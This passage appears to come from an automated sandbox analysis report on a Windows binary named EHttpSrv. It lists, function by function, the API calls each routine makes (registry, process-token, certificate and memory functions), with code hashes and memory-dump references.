                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #587$#578#657#718#741CursorDestroy
                                                                                                                • String ID:
                                                                                                                • API String ID: 1809897021-0
                                                                                                                • Opcode ID: 35b0d8bbf7a53fa6ecf621a24b0649546298cb5f07307ed5c26dcae269261dd7
                                                                                                                • Instruction ID: 977527ab95c424e6832e6ed6def81d3820f7ebedd5a3b3135f79d51513055072
                                                                                                                • Opcode Fuzzy Hash: 35b0d8bbf7a53fa6ecf621a24b0649546298cb5f07307ed5c26dcae269261dd7
                                                                                                                • Instruction Fuzzy Hash: E8115E70008B818FD311DF64C855B9ABBE4BF64714F00CE1DE4A6836A1DB78A608C792
                                                                                                                APIs
                                                                                                                  • Part of subcall function 20404CB0: wcscpy_s.MSVCR80 ref: 20404CD7
                                                                                                                • wcsncmp.MSVCR80 ref: 2042EC1B
                                                                                                                • wcsncmp.MSVCR80 ref: 2042EC48
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcsncmp$wcscpy_s
                                                                                                                • String ID: HKCU\$HKLM\$xXH $xXH
                                                                                                                • API String ID: 2575004286-3847691091
                                                                                                                • Opcode ID: 583dbd2c518f6b03a74561c9ecb2ed86324533ed251ee6c2f02ec5990ab2e6b3
                                                                                                                • Instruction ID: 5fbb683c4cbcbcf1aaa3ba0d5211c586f8c64f9d3f08b135c86883a917ea21da
                                                                                                                • Opcode Fuzzy Hash: 583dbd2c518f6b03a74561c9ecb2ed86324533ed251ee6c2f02ec5990ab2e6b3
                                                                                                                • Instruction Fuzzy Hash: 0DE1DE71A006489FDF14CF96E980BEA77B1BF19208F15C1A8ED056B386E738DE45CB60
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 20448B88
                                                                                                                • SendMessageW.USER32(00000000), ref: 20448BCB
                                                                                                                • #310.MFC80U ref: 20448C16
                                                                                                                • #4026.MFC80U(0000022D), ref: 20448C2A
                                                                                                                • #578.MFC80U ref: 20448C42
                                                                                                                • #6751.MFC80U(00000000,?), ref: 20448C7B
                                                                                                                • #6751.MFC80U(00000000,?), ref: 20448F2C
                                                                                                                  • Part of subcall function 2042D000: IsWindow.USER32(?), ref: 2042D037
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6751$#310#314#4026#578MessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 1613437865-0
                                                                                                                • Opcode ID: dbbf1c2679c8c57563a73d693fbeded845e95855667f570ce51ce7c4e9b716bd
                                                                                                                • Instruction ID: aef0371a62a55a85432a202e164e070c81619bdb81af31f70ff8ae9106dbb37a
                                                                                                                • Opcode Fuzzy Hash: dbbf1c2679c8c57563a73d693fbeded845e95855667f570ce51ce7c4e9b716bd
                                                                                                                • Instruction Fuzzy Hash: A0B1AB71A097809FE304CFA4C981B5EBBE1FB94714F108A2DF5418B7A0CB79E901DB92
                                                                                                                APIs
                                                                                                                • malloc.MSVCR80 ref: 2040C597
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 2040C5BB
                                                                                                                • malloc.MSVCR80 ref: 2040C5E7
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 2040C612
                                                                                                                • malloc.MSVCR80 ref: 2040C708
                                                                                                                • free.MSVCR80 ref: 2040C759
                                                                                                                • free.MSVCR80 ref: 2040C767
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: malloc$ByteCharMultiWidefree
                                                                                                                • String ID:
                                                                                                                • API String ID: 707110232-0
                                                                                                                • Opcode ID: bc2ad66ffb2963f783f2243d38d8883cee7a9bd424fa96275830423f5b417432
                                                                                                                • Instruction ID: f75eb00dc676f980c803eb227b2ca50fa95ea541d82a1da571b469d9a962dd34
                                                                                                                • Opcode Fuzzy Hash: bc2ad66ffb2963f783f2243d38d8883cee7a9bd424fa96275830423f5b417432
                                                                                                                • Instruction Fuzzy Hash: C4614C756043029FC314CF68C884B17BBE5AF88754F14C96DE989A7391E774EA08CB92
                                                                                                                APIs
                                                                                                                • #314.MFC80U(00000000,FEEA6C22), ref: 2044CA82
                                                                                                                • #310.MFC80U ref: 2044CAED
                                                                                                                • #5149.MFC80U(000001F4,000001F4), ref: 2044CB18
                                                                                                                • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000), ref: 2044CB29
                                                                                                                • #5398.MFC80U(000000FF), ref: 2044CBEB
                                                                                                                • #578.MFC80U ref: 2044CBFD
                                                                                                                • #6751.MFC80U(00000000,?), ref: 2044CC98
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310#314#5149#5398#578#6751CertNameString
                                                                                                                • String ID:
                                                                                                                • API String ID: 2456080415-0
                                                                                                                • Opcode ID: 359466542936a10d833dcea9c59399fb0e95c224dc76e324f40d3d4a4dd1047f
                                                                                                                • Instruction ID: fa41959962371d0794451eda7c1d9808ee06ed86ef66dff3c495645590ad59e6
                                                                                                                • Opcode Fuzzy Hash: 359466542936a10d833dcea9c59399fb0e95c224dc76e324f40d3d4a4dd1047f
                                                                                                                • Instruction Fuzzy Hash: 9E617F716087019BD710CFA4C885B5AB7E5FB98718F24C62CF568973E1CB38E945CBA1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1176#280#578#774
                                                                                                                • String ID:
                                                                                                                • API String ID: 2589826963-0
                                                                                                                • Opcode ID: 3aee841dd4767aa561259c6d97ef28f9627ad1a095f4b03319da11ed7311dfe6
                                                                                                                • Instruction ID: b412220d2f80d9e6b8f98ad02a641db55c70cde94908a098124107b1af562d9d
                                                                                                                • Opcode Fuzzy Hash: 3aee841dd4767aa561259c6d97ef28f9627ad1a095f4b03319da11ed7311dfe6
                                                                                                                • Instruction Fuzzy Hash: AA414B716087059FC314CF59C885A5AF7E5FB88729F108A2EF89687790DB39E904CF91
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000008,-00000023,6FAD4B78,?), ref: 2043D266
                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,20485878,00000000,?,00000000,?,00000000,00000008,-00000023,6FAD4B78,?), ref: 2043D287
                                                                                                                • wcscpy_s.MSVCR80 ref: 2043D2C1
                                                                                                                • wcsrchr.MSVCR80 ref: 2043D2F6
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 2043D325
                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,20485878,00000000,?,00000000,?,00000000), ref: 2043D33C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create$CloseOpenwcscpy_swcsrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 2152705125-0
                                                                                                                • Opcode ID: 58d862d149c1be47d7913818b6ab24ce32d2019250fc2f80153d569dc36f2dc7
                                                                                                                • Instruction ID: 73e8dee97a2906a9ac4023fad5512ce7367ed15ae19a3f53bcb8052f95a96eae
                                                                                                                • Opcode Fuzzy Hash: 58d862d149c1be47d7913818b6ab24ce32d2019250fc2f80153d569dc36f2dc7
                                                                                                                • Instruction Fuzzy Hash: F731D4712443007BD320DB95EC89F9777ADEF89B05F20881CFA0597185EA7CE504CB62
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memcpy_s
                                                                                                                • String ID: pVJ $pVJ
                                                                                                                • API String ID: 1502251526-1686371878
                                                                                                                • Opcode ID: b0fd80f6f29a2b4531f7504de39165ae335b15b96e92ffbd8b537b3fe6b44163
                                                                                                                • Instruction ID: 035c3c3053ea15f29b462dcaff85bb51d9f3f8aa72db6a330897e3da57f46125
                                                                                                                • Opcode Fuzzy Hash: b0fd80f6f29a2b4531f7504de39165ae335b15b96e92ffbd8b537b3fe6b44163
                                                                                                                • Instruction Fuzzy Hash: 6D313EB15083049FC750CF65C981B5BBBE4BB98714F40886EFA4DAB280E77999048B66
                                                                                                                APIs
                                                                                                                • #354.MFC80U(000000A7,?,FEEA6C22,?,?,00000000,00000000,204800D3,000000FF,204709B7,00000000,?,?,?,?), ref: 20469463
                                                                                                                • #416.MFC80U(000000A7,?,FEEA6C22,?,?,00000000,00000000,204800D3,000000FF,204709B7,00000000,?,?,?,?), ref: 2046947A
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U(?,FEEA6C22,00000000,?,00000000,?,2047AE6F,000000FF,20472632,?), ref: 20430DFC
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E0A
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U ref: 20430E17
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E25
                                                                                                                  • Part of subcall function 20430DC0: LoadCursorW.USER32(00000000,00007F89), ref: 20430EA4
                                                                                                                  • Part of subcall function 20430DC0: SetRectEmpty.USER32(?), ref: 20430F17
                                                                                                                • #310.MFC80U(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000000A7), ref: 204694D4
                                                                                                                  • Part of subcall function 2045CF80: #530.MFC80U(FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22,?,?,?,2047BED4), ref: 2045CFB1
                                                                                                                  • Part of subcall function 2045CF80: #6003.MFC80U(00000000,000000FF,FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22), ref: 2045CFCD
                                                                                                                • #563.MFC80U(?), ref: 2046951D
                                                                                                                  • Part of subcall function 20423810: #572.MFC80U(FEEA6C22,20428001,00000000,2047A038,000000FF,20422C5E,20428085,20428001,000000FF,FEEA6C22,?,?,?,2047B870,000000FF,20428001), ref: 20423837
                                                                                                                  • Part of subcall function 20436CC0: #572.MFC80U(FEEA6C22,00000000,?,?,?,?,2047FB9B,000000FF,2046954E,?,?,?), ref: 20436CEA
                                                                                                                  • Part of subcall function 20436CC0: #310.MFC80U(FEEA6C22,00000000,?,?,?,?,2047FB9B,000000FF,2046954E,?,?,?), ref: 20436CFE
                                                                                                                  • Part of subcall function 20436CC0: memset.MSVCR80 ref: 20436DBB
                                                                                                                • #776.MFC80U(20485878,?,?,?), ref: 20469574
                                                                                                                • #1079.MFC80U ref: 2046957D
                                                                                                                • LoadAcceleratorsW.USER32(?,0000008A), ref: 2046958B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #310$#557#572Load$#1079#354#416#530#563#6003#776AcceleratorsCursorEmptyRectmemset
                                                                                                                • String ID:
                                                                                                                • API String ID: 1543791554-0
                                                                                                                • Opcode ID: cddfcd618fcc776f6786d7afcf94eb45054a47f4e56a1e55c903af9242f48df2
                                                                                                                • Instruction ID: a46ccbdb704f9dd8e5b3b3a8ee9067b3fdc2097a17fb0de770ace96f8e92f55f
                                                                                                                • Opcode Fuzzy Hash: cddfcd618fcc776f6786d7afcf94eb45054a47f4e56a1e55c903af9242f48df2
                                                                                                                • Instruction Fuzzy Hash: 1B412EB0508B818ED311DF74C48579BFFE5AFA5608F108D1DF4DA87251DB79A108CB92
                                                                                                                APIs
                                                                                                                • #1176.MFC80U(?,20435667), ref: 20438A49
                                                                                                                • #6282.MFC80U(?,?,?,?,?,?,20435667), ref: 20438A80
                                                                                                                • #5316.MFC80U(?,?,?,?,?,?,20435667), ref: 20438ABC
                                                                                                                • #1172.MFC80U(00000003,00000000,?,?,?,?,?,?,20435667), ref: 20438AD8
                                                                                                                • #764.MFC80U(?,00000003,00000000,?,?,?,?,?,?,20435667), ref: 20438AE8
                                                                                                                • #265.MFC80U(00000000,00000003,00000000,?,?,?,?,?,?,20435667), ref: 20438B0A
                                                                                                                • memset.MSVCR80 ref: 20438B29
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1172#1176#265#5316#6282#764memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 3381220976-0
                                                                                                                • Opcode ID: d024e478ef35a841cad81b9426e116e3315bd944f4411aceb219fae319504730
                                                                                                                • Instruction ID: bf20848afa7e4fd66a1a797804d1d0c7eadc0c465d518c05ff1c10985fcbfe0d
                                                                                                                • Opcode Fuzzy Hash: d024e478ef35a841cad81b9426e116e3315bd944f4411aceb219fae319504730
                                                                                                                • Instruction Fuzzy Hash: C02128723013054BE620AFE49C45B9BB3599F94B60F60C61EFA1947AD0EA7CE90587A1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5149#5398$#314#6232#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 180633984-0
                                                                                                                • Opcode ID: 98d6e08747b58175edc8de0211b6bc34471b3f46bfc46e5587e545123c05fc96
                                                                                                                • Instruction ID: 4d7bf4a7517d6a98d7be27a3230b32b6c0188237c0bd57952305acd3f7769b65
                                                                                                                • Opcode Fuzzy Hash: 98d6e08747b58175edc8de0211b6bc34471b3f46bfc46e5587e545123c05fc96
                                                                                                                • Instruction Fuzzy Hash: BD31E3713047019BD7148F64CC85BAAB7A5BB94B28F10872DF466577D0DF38A808C792
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #5149#5398$#314#6232#6751
                                                                                                                • String ID:
                                                                                                                • API String ID: 180633984-0
                                                                                                                • Opcode ID: 709f66a4117406ca6d6d34b38997a045ea813d83459dce7f719479f88577e3ac
                                                                                                                • Instruction ID: 483a925638e855082552fd50976feeb080d5bc34dbf6352f9900ef8d0743a9c5
                                                                                                                • Opcode Fuzzy Hash: 709f66a4117406ca6d6d34b38997a045ea813d83459dce7f719479f88577e3ac
                                                                                                                • Instruction Fuzzy Hash: CA31C2312047029BD7148F64DC85BAABBA5BB98728F10873DF566473D0DF38A808C791
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • \StringFileInfo\%04X%04X\%s, xrefs: 20410E63
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: memset$QueryValuelstrcpynwsprintf
                                                                                                                • String ID: \StringFileInfo\%04X%04X\%s
                                                                                                                • API String ID: 3128287595-3176804452
                                                                                                                • Opcode ID: 3c0e6aa56a169eea6ca0dda9920636210079d7c0bc2b52ee6a1792caa3739355
                                                                                                                • Instruction ID: fc621e41e0b6f7a248fb3d8dc6ec6a1377c4a68bc81ad14f51c872d7764165fd
                                                                                                                • Opcode Fuzzy Hash: 3c0e6aa56a169eea6ca0dda9920636210079d7c0bc2b52ee6a1792caa3739355
                                                                                                                • Instruction Fuzzy Hash: C021D6B1504325ABC314DB96CC44FA7F7E8AF68B05F00C92DBA0997250DBB9E94487D5
                                                                                                                APIs
                                                                                                                • OpenThreadToken.ADVAPI32(00000000,00020008,00000000,?,?,2044A3EC), ref: 2043DCA6
                                                                                                                • CloseHandle.KERNEL32(?,?), ref: 2043DCC9
                                                                                                                • CloseHandle.KERNEL32(00000000,?,2044A3EC), ref: 2043DCCC
                                                                                                                  • Part of subcall function 2043DB70: GetTokenInformation.ADVAPI32(?,00000001(TokenIntegrityLevel),?,00000408,?,00000000,00000000,76232EE0), ref: 2043DBB9
                                                                                                                  • Part of subcall function 2043DB70: LookupAccountSidW.ADVAPI32(00000000,?,?,?,?,?,?), ref: 2043DBEC
                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,00000000,?,2043DD55,?,00000000,?,2044A3EC), ref: 2043DCDE
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00020008,?,?,2044A3EC), ref: 2043DCF5
                                                                                                                • CloseHandle.KERNEL32(?,?), ref: 2043DD18
                                                                                                                • CloseHandle.KERNEL32(00000000,?,2044A3EC), ref: 2043DD1B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$OpenToken$Process$AccountInformationLookupThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2379517368-0
                                                                                                                • Opcode ID: ffa320f2e2dddec958b9ccbc10619eb6b4d988d711617833b0ec466f2450dc13
                                                                                                                • Instruction ID: 77ace5bbacb9f4f7b807782b2e5576dc0f924ed73937b2c6fd6a01b8e3c90a5d
                                                                                                                • Opcode Fuzzy Hash: ffa320f2e2dddec958b9ccbc10619eb6b4d988d711617833b0ec466f2450dc13
                                                                                                                • Instruction Fuzzy Hash: ED11AC712047116BD301CBA49C85E3BB7ACEF89A86F20891DFA1187240DB78EC0597A5
                                                                                                                APIs
